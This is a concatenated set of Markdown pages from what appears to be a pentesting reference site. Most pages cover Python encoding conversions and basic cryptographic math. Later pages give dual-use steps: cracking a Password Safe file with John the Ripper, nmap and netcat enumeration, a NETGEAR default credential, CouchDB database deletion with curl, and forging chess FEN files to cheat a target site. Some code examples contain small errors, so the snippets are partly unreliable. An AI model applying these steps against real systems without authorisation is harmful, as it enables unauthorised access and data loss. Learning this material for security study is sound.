developed in 1992. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-03-07 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | There are many online tools for decryption RIPEMD. For example, 14 | 15 | - [https://gchq.github.io/CyberChef/#recipe=RIPEMD('320')](https://gchq.github.io/CyberChef/#recipe=RIPEMD('320')) 16 | - [https://md5hashing.net/hash/ripemd160](https://md5hashing.net/hash/ripemd160) 17 | 18 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/rot13-rot47.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: ROT13, ROT47 3 | description: ROT13 (rotate by 13 places), ROT47 (rotate by 47 places) are simple letter substitution ciphers. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2022-12-22 8 | draft: false 9 | --- 10 | 11 | ## Decode 12 | 13 | **[CyberChef](https://gchq.github.io/CyberChef/)** is useful online tools to decode ROT13, ROT47. 14 | 15 |
16 | 17 | ## Encode 18 | 19 | ### ROT13 20 | 21 | ```sh 22 | echo hello | tr 'A-Za-z' 'N-ZA-Mn-za-m' 23 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/transposition-cipher.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Transposition Cipher 3 | description: Transposition Cipher is a method of encryption which scrambles the positions of characters without changing the characters themselves. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-02-21 8 | draft: false 9 | --- 10 | 11 | ## Decode 12 | 13 | - **[Online Decoder](https://www.dcode.fr/transposition-cipher)** -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/vigenere-cipher.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Vigenere Cipher 3 | description: Vigenere Cipher is a method of encrypting alphabetic text by using a series of interwoven Caesar ciphers, based on the letters of a keyword. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-03-28 8 | draft: false 9 | --- 10 | 11 | ## Online Tools 12 | 13 | - **[CyberChef](https://gchq.github.io/CyberChef/#recipe=Vigen%C3%A8re_Decode(''))** 14 | - **[Vigenere Cipher Encoder/Decoder](https://www.dcode.fr/vigenere-cipher)** 15 | - **[Vigenere Solver](https://www.guballa.de/vigenere-solver)** 16 | 17 | -------------------------------------------------------------------------------- /src/exploit/cryptography/bit-wise-operation/_data.yml: -------------------------------------------------------------------------------- 1 | category2: bit-wise-operation -------------------------------------------------------------------------------- /src/exploit/cryptography/bit-wise-operation/and-bitwise-operations.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: AND Bitwise Operations 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Basic 12 | 13 | We can do the **AND** operations using **`&`** operator. 14 | 15 | ```python 16 | 24 & 72 17 | 0x18 & 0x48 18 | # 8 19 | 20 | # Binary representation 21 | bin(24 & 72) 22 | # '0b1000' 23 | ``` 24 | -------------------------------------------------------------------------------- /src/exploit/cryptography/bit-wise-operation/or-bitwise-operations.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: OR Bitwise Operations 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Basic 12 | 13 | Assume we want to **OR** operation **0100** and **1001**. 14 | 15 | ```python 16 | 0100 17 | # OR 18 | 1001 19 | 20 | # Result: 1101 21 | ``` 22 | 23 | We can do that using **`|`** operator in Python. 24 | 25 | ```python 26 | 0b0100 | 0b1001 27 | # 13 ('1101' in binary) 28 | 29 | 4 | 9 30 | # 13 ('1101' in binary) 31 | 32 | # Binary representation 33 | bin(0b0100 | 0b1001) 34 | # 0b1101 35 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/bit-wise-operation/shift-bitwise-operations.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Shift Bitwise Operations 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Basic 12 | 13 | ### Left Bit Shift 14 | 15 | Assume we want to left bit shift the binary **`0100`** as below. 16 | 17 | ```txt 18 | 0100 -> 1000 19 | ``` 20 | 21 | We can achieve this using the **`<<`** operator in Python. 22 | 23 | ```python 24 | 0b100 << 1 25 | # 8 ('1000' in binary) 26 | 27 | 4 << 1 28 | # 8 ('1000' in binary) 29 | 30 | # Output as the binary representation 31 | bin(8 << 1) 32 | # 0b1000 33 | ``` 34 | 35 | ### Right Bit Shift 36 | 37 | Assume we want to right bit shift the binary **`0100`** as below. 38 | 39 | ```txt 40 | 0100 -> 0010 41 | ``` 42 | 43 | We can achieve this using the **`>>`** operator in Python. 44 | 45 | ```python 46 | 0b100 >> 1 47 | # 2 ('10' in binary) 48 | 49 | 4 >> 1 50 | # 2 ('10' in binary) 51 | 52 | bin(4 >> 1) 53 | # 0b10 54 | ``` 55 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/_data.yml: -------------------------------------------------------------------------------- 1 | category2: conversion -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-bytes-to-hex-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Bytes to Hex in Python 3 | description: Converting bytes to hex is easily done by hex method in python. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | Using **`hex`** method in Python, we can easily convert bytes to hex. 14 | 15 | ```python 16 | b'Hello World'.hex() 17 | # 48656c6c6f20576f726c64 18 | 19 | b'abcdef'.hex() 20 | # 616263646566 21 | 22 | b'\xe3\x81\xad\xe3\x81\x93'.hex() 23 | # e381ade38193 24 | ``` 25 | 26 | By the way, for converting from string to bytes before converting bytes to hex, use **`encode`** method as below. 27 | 28 | ```python 29 | 'Hello World'.encode().hex() 30 | # 48656c6c6f20576f726c64 31 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-bytes-to-int-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Bytes to Int in Python 3 | description: Converting bytes to int is easily done by int.from_bytes method in python. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | ### Big Endian 14 | 15 | For using big endian, we can specify **"big"** to the **byteorder** argument (**the second argument**) of **int.from_bytes** method in Python. 16 | 17 | ```python 18 | int.from_bytes(b'hello', byteorder='big') 19 | # 448378203247 20 | 21 | int.from_bytes(b'\x00\x01', byteorder='big') 22 | # 1 23 | ``` 24 | 25 | ### Little Endian 26 | 27 | For using little endian, we can specify **"little"** to the **byteorder** argument (**the second argument**) of **int.from_bytes** method in Python. 28 | 29 | ```python 30 | int.from_bytes(b'hello', byteorder='little') 31 | # 478560413032 32 | 33 | int.from_bytes(b'\x00\x01', byteorder='little') 34 | # 256 35 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-bytes-to-string-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Bytes to String in Python 3 | description: We can decode bytes to string in Python. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | Using **`decode`** method in Python, we can easily convert **bytes** to **string**. 14 | There are three types of **`decode`** methods as below. 15 | 16 | All of the results say **"Hello"**. 17 | 18 | ```python 19 | b'Hello'.decode('utf-8') 20 | 21 | bytes.decode(b'Hello', 'utf-8') 22 | 23 | codecs.decode(b'Hello', 'utf-8') 24 | ``` 25 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-character-to-binary-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Character to Binary in Python 3 | description: We can convert a character to binary using the format method in Python. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | ### Character -> N-bit 14 | 15 | Using **`format`** method, the given character is converted to bits. 16 | 17 | ```python 18 | char = 'a' 19 | format(ord(char), 'b') 20 | # 1100001 21 | ``` 22 | 23 | ### Character -> 8-bit 24 | 25 | We can specify **8-bit** representation by prepending **`{0:08b}`** before the **`format`** method. 26 | 27 | ```python 28 | char = 'a' 29 | '{0:08b}'.format(ord(char), 'b') 30 | # 01100001 31 | ``` 32 | 33 | ### Character -> 16-bit 34 | 35 | We can specify **16-bit** representation by prepending **`{0:016b}`** before the **`format`** method. 36 | 37 | ```python 38 | char = 'a' 39 | '{0:016b}'.format(ord(char), 'b') 40 | # 0000000001100001 41 | ``` 42 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-character-to-unicode-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Character to Unicode in Python 3 | description: We can easily convert a character to Unicode using the ord method in Python. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | We can use **`ord`** method in Python to convert a **character** to **Unicode**. 14 | 15 | ```python 16 | ord('a') 17 | # 97 18 | ``` 19 | 20 | By the way, use **`chr`** method to convert **Unicode** to a **character**. 21 | 22 | ```python 23 | chr(97) 24 | # a 25 | ``` 26 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-hex-to-bytes-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Hex to Bytes in Python 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-09-04 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | Using **`bytes.fromhex`** method, we can convert **hex string** to **bytes string**. 14 | 15 | ```python 16 | hex_str = "48656c6c6f20576f726c64" 17 | 18 | bytes.fromhex(hex_str) 19 | # b'Hello World' 20 | ``` 21 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-int-to-binary-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Int to Binary in Python 3 | description: Using the format method in Python, we can convert int to binary. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | ### Int -> N-bit 14 | 15 | Specify **'b'** in the **`format`** method in Python. 16 | 17 | ```python 18 | format(123, 'b') 19 | 20 | # 1111011 21 | ``` 22 | 23 | ### Int -> 8-bit 24 | 25 | We can specify **`8-bit`** by prepending **`{0:08b}`** before the **`format`** method. 26 | Alternatively, **`zfill`** method can be used for this purpose. 27 | 28 | ```python 29 | '{0:08b}'.format(123, 'b') 30 | format(123, 'b').zfill(8) 31 | 32 | # 01111011 33 | ``` 34 | 35 | ### Int -> 16-bit 36 | 37 | This is also the same as above, we can specify **`16-bit`** by prepending **`{0:016b}`**, or **`zfill`** method can be used. 38 | 39 | ```python 40 | '{0:016b}'.format(123, 'b') 41 | format(123, 'b').zfill(16) 42 | 43 | # 0000000001111011 44 | ``` 45 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-int-to-bytes-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Int to Bytes in Python 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | Using the **`to_bytes`** built-in method in Python, we can conavert int to bytes. 14 | In addition, we can specify the length to the first argument in **`to_bytes`** method. 15 | 16 | ### Big Endian 17 | 18 | By specifying **'big'** to the **`byteorder`** argument, the result is the **big endian** bytes order. 19 | 20 | ```python 21 | num = 1234 22 | 23 | num.to_bytes(2, byteorder='big') 24 | # b'\x04\xd2' 25 | 26 | num.to_bytes(3, byteforder='big') 27 | # b'\x00\x04\xd2' 28 | 29 | num.to_bytes(4, byteorder='big') 30 | # b'\x00\x00\x04\xd2' 31 | ``` 32 | 33 | ### Little Endian 34 | 35 | By specifying **'big'** to the **`byteorder`** argument, the result is the **little endian** bytes order. 36 | 37 | ```python 38 | num = 1234 39 | 40 | num.to_bytes(2, byteorder='little') 41 | # b'\xd2\x04 42 | 43 | num.to_bytes(3, byteorder='little') 44 | # b'\xd2\x04\x00' 45 | 46 | num.to_bytes(4, byteorder='little') 47 | # b'\xd2\x04\x00\x00' 48 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-int-to-hex-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Int to Hex in Python 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | We can convert int to hex using **`hex`** method in Python. 14 | 15 | ```python 16 | hex(123) 17 | # 0x7b 18 | 19 | hex(448378203247) 20 | # 0x68656c6c6f 21 | ``` 22 | 23 | To remove the prefix **`0x`**, exlude the characters from the string with **`[2:]`**. 24 | 25 | ```python 26 | hex(123)[2:] 27 | # 7b 28 | 29 | hex(448378203247)[2:] 30 | # 68656c6c6f 31 | ``` 32 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-string-to-binary-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert String to Binary in Python 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | For converting strings to binary, we need to convert each character to binary by first converting the character to Unicode. 14 | Then concatenate these binaries. 15 | 16 | ```python 17 | text = "Hello" 18 | 19 | bin_str = "" 20 | for c in text: 21 | c_bin = bin(ord(c))[2:] # remove "0b" prefix 22 | bin_str += c_bin.zfill(8) # padding to 8-bit for adjustment 23 | 24 | print(bin_str) 25 | # 0100100001100101011011000110110001101111 26 | ``` 27 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-string-to-bytes-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert String to Bytes in Python 3 | description: We can encode strings to bytes using Python's built-in methods. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | We can use several ways to encode string to bytes in Python. 14 | 15 | - **string** class has **`encode`** method to encode strings to bytes. 16 | - **bytes** method converts string to bytes. 17 | 18 | Also we can specify the format e.g. **`utf-8`**, **`shift_jis`** as argument. 19 | 20 | ```python 21 | # Using encode() method 22 | "Hello".encode('utf-8') 23 | "Hello".encode('shift_jis') 24 | 25 | # Using bytes() method 26 | bytes("Hello", 'utf-8') 27 | bytes("Hello", 'shift_jis') 28 | 29 | # Result: b'Hello' 30 | ``` 31 | 32 | ### Decode Bytes to String 33 | 34 | By the way, we can decode bytes to string with **`decode`** method. 35 | 36 | ```python 37 | b"Hello".decode() 38 | # Hello 39 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-unicode-to-character-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Unicode to Character in Python 3 | description: We can easily convert Unicode to character using the chr method in Python. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | Using **`chr`** method in Python, we can convert Unicode to a character as below. 14 | 15 | ```python 16 | chr(97) 17 | # a 18 | 19 | chr(98) 20 | # b 21 | ``` 22 | 23 | By the way, use **`ord`** method to convert **character** to a **Unicode**. 24 | 25 | ```python 26 | ord('a') 27 | # 97 28 | ``` 29 | -------------------------------------------------------------------------------- /src/exploit/cryptography/key-derivation-function/_data.yml: -------------------------------------------------------------------------------- 1 | category2: key-derivation-function -------------------------------------------------------------------------------- /src/exploit/cryptography/key-derivation-function/scrypt.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Scrypt 3 | description: Scrypt is a password-based key derivation function. 4 | tags: 5 | - Cryptography 6 | - Key Derivation Function 7 | refs: 8 | - https://pycryptodome.readthedocs.io/en/latest/src/protocol/kdf.html#scrypt 9 | date: 2023-08-06 10 | draft: false 11 | --- 12 | 13 | ## Using Scrypt in Python 14 | 15 | We can use scrypt easily thanks of Pycryptodome. 16 | We need to install it first. 17 | 18 | ```python 19 | pip install pycryptodome 20 | ``` 21 | 22 | Below is a Python script to derive a key from a password with scrypt. 23 | 24 | ```python 25 | from Crypto.Protocol.KDF import scrypt 26 | from Crypto.Random import get_random_bytes 27 | 28 | password = b'secret' 29 | salt = get_random_bytes(16) 30 | key = scrypt(password, salt, 16, N=2**14, r=8, p=1) 31 | print(f"key: {key.hex()}") 32 | ``` 33 | -------------------------------------------------------------------------------- /src/exploit/cryptography/math/_data.yml: -------------------------------------------------------------------------------- 1 | category2: math -------------------------------------------------------------------------------- /src/exploit/cryptography/math/exponential.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Exponentiation 3 | description: 4 | tags: 5 | - Cryptography 6 | - Math 7 | refs: 8 | - https://en.wikipedia.org/wiki/Exponentiation 9 | date: 2023-09-07 10 | draft: false 11 | --- 12 | 13 | ## Basic 14 | 15 | We can calculate the exponentiation using **'\*\*'** operator in Python. 16 | 17 | ```python 18 | 2 ** 4 19 | # 16 20 | 21 | 6 ** 8 22 | # 1679616 23 | ``` 24 | 25 |
26 | 27 | ## Using Pow Method in Python 28 | 29 | The **`pow`** method can be used for the exponentiation. 30 | 31 | ```python 32 | pow(2, 4) 33 | # 2 ** 4 = 16 34 | ``` 35 | 36 | ### Modular Exponentiation 37 | 38 | In addition, we can find the remainder of dividing a rased value by a specific number. 39 | This may be sometimes used to find the secret key in **key derivation functions**, etc. 40 | 41 | ```python 42 | pow(2, 4, 6) 43 | # 2 ** 4 % 6 = 4 44 | ``` 45 | 46 |
47 | 48 | ## Inverse 49 | 50 | ```python 51 | from Crypto.Util.number import inverse 52 | 53 | inverse(3, 10) # 7 54 | pow(3, -1, 10) # 7 55 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/math/modular-congruence.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Modular Congruence 3 | description: 4 | tags: 5 | - Cryptography 6 | - Math 7 | - Modular Arithmetic 8 | refs: 9 | - https://cryptohack.org/courses/modular/ma0/ 10 | date: 2023-09-02 11 | draft: false 12 | --- 13 | 14 | ## Basic 15 | 16 | In modular congruence, the following rules apply: 17 | 18 | ```txt 19 | If `a ≡ b mod c`, then `b ≡ a mod c` 20 | ``` 21 | 22 | So if we have the following problem, 23 | 24 | ```python 25 | 39 ≡ x mod 8 26 | ``` 27 | 28 | To find **`x`** value, we can calculate it as below using Python. 29 | 30 | ```python 31 | x = 39 % 8 32 | print(x) 33 | ``` 34 | -------------------------------------------------------------------------------- /src/exploit/cryptography/math/quadratic-residue.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Quadratic Residue 3 | description: 4 | tags: 5 | - Cryptography 6 | - Math 7 | - Modular Arithmetic 8 | refs: 9 | - https://cryptohack.org/courses/modular/root1/ 10 | date: 2023-09-02 11 | draft: false 12 | --- 13 | 14 | ## Basic 15 | 16 | An integer **`x`** is called a quadratic residue modulo **`p`**. 17 | 18 | ```python 19 | a**2 = x mod p 20 | ``` 21 | 22 | ### Brute Force 23 | 24 | To calculate a quadratic residue, the following Python script is an example for that. 25 | 26 | ```python 27 | p = 71 28 | 29 | for a in range(p): 30 | qr = (pow(a, 2, p)) 31 | print(f"a={a} : qr={qr}") 32 | ``` 33 | 34 | ### Legendre Symbol 35 | 36 | According to Legendre Symbol, the following rules hold: 37 | 38 | ```python 39 | # `a` is a quadratic residue and `a != 0 mod p` 40 | a**(p-1)/2 mod p == 1 41 | 42 | # `a` is a quadratic non-residue mod p 43 | a**(p-1)/2 mod p == -1 44 | 45 | # `a ≡ 0 mod p` 46 | a**(p-1)/2 mod p == 0 47 | ``` 48 | 49 | We can check if an integer is a quadratic residue or not referring to the above. 50 | 51 | ```python 52 | print(pow(a, (p-1)//2, p) == 1) 53 | # If True, `a` is a quadratic resudiue. 54 | ``` 55 | -------------------------------------------------------------------------------- /src/exploit/cryptography/tool/_data.yml: -------------------------------------------------------------------------------- 1 | category2: tool -------------------------------------------------------------------------------- /src/exploit/cryptography/tool/password-safe-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Password Safe Pentesting 3 | description: Password Save is a password database utility. We may retrieve passwords for users. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2025-03-13 8 | draft: false 9 | --- 10 | 11 | ## Install PasswordSafe Manager 12 | 13 | Go to the [release page](https://github.com/pwsafe/pwsafe/releases) and download it. 14 | 15 | For example, if you use Debian, download `.deb` package and run the following command: 16 | 17 | ```bash 18 | sudo dpkg -i passwordsafe-debian12-x.x-amd64.deb 19 | ``` 20 | 21 | ## Analyze `.pwsafe3` file 22 | 23 | ```bash 24 | pwsafe example.pwsafe3 25 | ``` 26 | 27 | ## Crack `.pwsafe` Password 28 | 29 | If the password is required to open `.pwsafe` file in the PasswordSafe manger, we might be able to crack the password of the `.pwsafe` file as below: 30 | 31 | ```bash 32 | pwsafe2john example.pwsafe3 > hash.txt 33 | john --wordlist=wordlist.txt hash.txt 34 | ``` 35 | -------------------------------------------------------------------------------- /src/exploit/database/_data.yml: -------------------------------------------------------------------------------- 1 | category1: database 2 | related_menus: 3 | - title: Database 4 | id: others -------------------------------------------------------------------------------- /src/exploit/database/couchdb-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: CouchDB Pentesting 3 | description: Apache CouchDb is a document-oriented NoSQL database. Default ports are 5984, 6984. 4 | tags: 5 | - Database 6 | refs: 7 | - https://guide.couchdb.org/draft/tour.html 8 | date: 2022-12-28 9 | draft: false 10 | --- 11 | 12 | ## Directories 13 | 14 | ```sh 15 | # List all databases 16 | /_all_dbs 17 | 18 | # Show information of the database 19 | / 20 | 21 | # Futon administration interface 22 | /_utils/ 23 | # Temporary View 24 | /_utils/database.html?/_temp_view 25 | ``` 26 | 27 |
28 | 29 | ## Basic Operations 30 | 31 | ```sh 32 | # Create a new database 33 | curl -X PUT https://example.com:5984/ 34 | 35 | # Delete a database 36 | curl -X DELETE https://example.com:5984/ 37 | ``` -------------------------------------------------------------------------------- /src/exploit/database/sqlite-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: SQLite Pentesting 3 | description: SQLite is a database engine. 4 | tags: 5 | - Database 6 | refs: 7 | date: 2024-10-03 8 | draft: false 9 | --- 10 | 11 | ## Interpreter 12 | 13 | ```sh 14 | sqlite3 sample.db 15 | sqlite3 sample.sqlite 16 | sqlitebrowser sample.db 17 | ``` 18 | 19 |
20 | 21 | ## Commands 22 | 23 | ```sh 24 | # Help 25 | sqlite> .help 26 | 27 | # Show databases 28 | sqlite> .databases 29 | 30 | # Show tables 31 | sqlite> .tables 32 | 33 | # Show table information 34 | sqlite> PRAGMA table_info(table_name); 35 | 36 | # Dump contents of tables 37 | sqlite> .dump 38 | 39 | # SQL commands to display values in the table 40 | sqlite> SELECT * FROM
; 41 | # Display values in Hex 42 | sqlite> SELECT HEX(column_name) FROM
; 43 | 44 | # Exit the interpreter 45 | sqlite> .quit 46 | ``` -------------------------------------------------------------------------------- /src/exploit/dns/_data.yml: -------------------------------------------------------------------------------- 1 | category1: dns 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/dns/multicast-dns-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: mDNS (Multicast DNS) Pentesting 3 | description: Multicast DNS protocol resolves hostnames to IP addresses within small networks that do not include a local name server. It is a zero-configuration (zeroconf) service. It uses UDP. A default port is 5353. 4 | tags: 5 | - DNS 6 | refs: 7 | date: 2022-12-01 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | nmap -sU --script dns-service-discovery -p 5353 15 | ``` -------------------------------------------------------------------------------- /src/exploit/email/_data.yml: -------------------------------------------------------------------------------- 1 | category1: email 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/email/imap-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: IMAP (Internet Message Access Protocol) Pentesting 3 | description: IMAP is an internet standard protocol used by email clients. Default ports are 143, 993. 4 | tags: 5 | - Email 6 | refs: 7 | date: 2023-03-18 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | nmap --script imap-capabilities -p 143 15 | ``` 16 | 17 | ### Banner Grabbing 18 | 19 | ```sh 20 | nc -nv 143 21 | openssl s_client -connect :993 -quiet 22 | ``` 23 | 24 |
25 | 26 | ## Connect 27 | 28 | ```bash 29 | telnet 10.0.0.1 143 30 | ``` 31 | 32 |
33 | 34 | ## Commands 35 | 36 | ```bash 37 | # Login 38 | a1 login "" "" 39 | 40 | # Logout 41 | a1 logout 42 | 43 | # Close mailbox 44 | a1 close 45 | ``` -------------------------------------------------------------------------------- /src/exploit/email/pop-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: POP (Post Office Protocol) Pentesting 3 | description: Post Office Protocol is an application-layer protocol used by email clients. POP3 is a commonly used version. Default ports are 110, 995. 4 | tags: 5 | - Email 6 | refs: 7 | date: 2023-07-19 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```bash 14 | nmap --script "pop3-capabilities or pop3-ntlm-info" -p 110 15 | ``` 16 | 17 |
18 | 19 | ## Connect 20 | 21 | ```bash 22 | nc 110 23 | # or 24 | telnet 110 25 | ``` 26 | 27 |
28 | 29 | ## Commands 30 | 31 | ```bash 32 | # Login 33 | USER 34 | PASS 35 | 36 | # Number and total size of all messages 37 | STAT 38 | # List messages and size 39 | LIST 40 | # Retrieve the message of given number 41 | RETR 42 | # Delete the message of given number 43 | DELE 44 | # Reset the mailbox 45 | RSET 46 | # Exit the mail server 47 | QUIT 48 | ``` 49 | -------------------------------------------------------------------------------- /src/exploit/game/_data.yml: -------------------------------------------------------------------------------- 1 | category1: game 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/game/chess-game-cheating.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Chess Game Cheating 3 | description: 4 | tags: 5 | - Game 6 | draft: false 7 | --- 8 | 9 | ## FEN Manipulation 10 | 11 | Forsyth-Edwards Notation (FEN) is a standard notation for describing a particular position of a chess game. The file format is `.fen`. 12 | The [FEN Generator](http://www.netreal.de/Forsyth-Edwards-Notation/index.php) allows us to create a custom FEN string. 13 | For example, below is that our all staffs are queens except the king, and that of the enemy are pawns except the king. 14 | 15 | ```bash 16 | pppkpppp/pppppppp/8/8/8/8/QQQQQQQQ/QQQQKQQQ 17 | # or 18 | ppppkppp/pppppppp/8/8/8/8/QQQQQQQQ/QQQQKQQQ w KQkq - 0 1 19 | ``` 20 | 21 | Then paste the FEN string to `.fen` file. 22 | Or paste in the [pastebin](https://pastebin.com/) and click “raw” button then we can get the URL link of the raw mode. 23 | This file can be able to be used for uploading, manipulating in the target website. 24 | -------------------------------------------------------------------------------- /src/exploit/game/minecraft-server-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Minecraft Server Pentesting 3 | description: A Minecraft server is a player-owned or business-owned multiplayer game server. A default port is 25565. 4 | tags: 5 | - Game 6 | refs: 7 | date: 2023-01-26 8 | draft: false 9 | --- 10 | 11 | ## Run a Server 12 | 13 | ```bash 14 | # Create the screen session 15 | screen -C 16 | 17 | # Reattach to the session 18 | screen -r 19 | ``` 20 | 21 |
22 | 23 | ## Commands in the Server 24 | 25 | ```bash 26 | # Print usage 27 | help 28 | ``` 29 | -------------------------------------------------------------------------------- /src/exploit/hardware/_data.yml: -------------------------------------------------------------------------------- 1 | category1: hardware 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/hardware/gerber-files.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Gerber (GBR) Files 3 | description: The Gerber format is an ASCII, vector format for printed circuit board (PCB) designs. 4 | tags: 5 | - Hardware 6 | refs: 7 | date: 2023-03-23 8 | draft: false 9 | --- 10 | 11 | ## Gerber Viewer 12 | 13 | There are many online tools to view GBR file. 14 | 15 | - [Online Gerber Viewer](https://www.pcbway.com/project/OnlineGerberViewer.html) -------------------------------------------------------------------------------- /src/exploit/hardware/netgear-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: NETGEAR Pentesting 3 | description: NETGEAR produces networking hardware for consumers, businesses, and service providers. 4 | tags: 5 | - Hardware 6 | - IoT 7 | refs: 8 | date: 2023-01-06 9 | draft: false 10 | --- 11 | 12 | ## Enumeration 13 | 14 | ```sh 15 | nmap --script modbus-discover --script-args modbus-discover.aggressive=true -p 502 16 | ``` 17 | 18 |
19 | 20 | ## Default Credentials 21 | 22 | ```txt 23 | admin:password 24 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/_data.yml: -------------------------------------------------------------------------------- 1 | category1: linux 2 | related_menus: 3 | - title: Privilege Escalation 4 | id: privilege-escalation 5 | - title: Post Exploitation 6 | id: post-exploitation 7 | - title: Backup 8 | id: backup 9 | - title: Container 10 | id: container 11 | - title: Archive 12 | id: archive 13 | - title: Attack 14 | id: attack 15 | - title: Protocol 16 | id: protocol 17 | - title: Management 18 | id: management -------------------------------------------------------------------------------- /src/exploit/linux/archive/7z.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: 7z 3 | description: The 7z command is a compression utility that is used to compress and decompress files in Unix, Linux, and other operating systems. 4 | tags: 5 | - Archive 6 | refs: 7 | date: 2023-03-28 8 | draft: false 9 | --- 10 | 11 | ## Compress 12 | 13 | ```sh 14 | # a: Add files to archive 15 | 7z a example.zip example.txt 16 | # With password 17 | 7z a example.zip example.txt -p password 18 | ``` 19 | 20 |
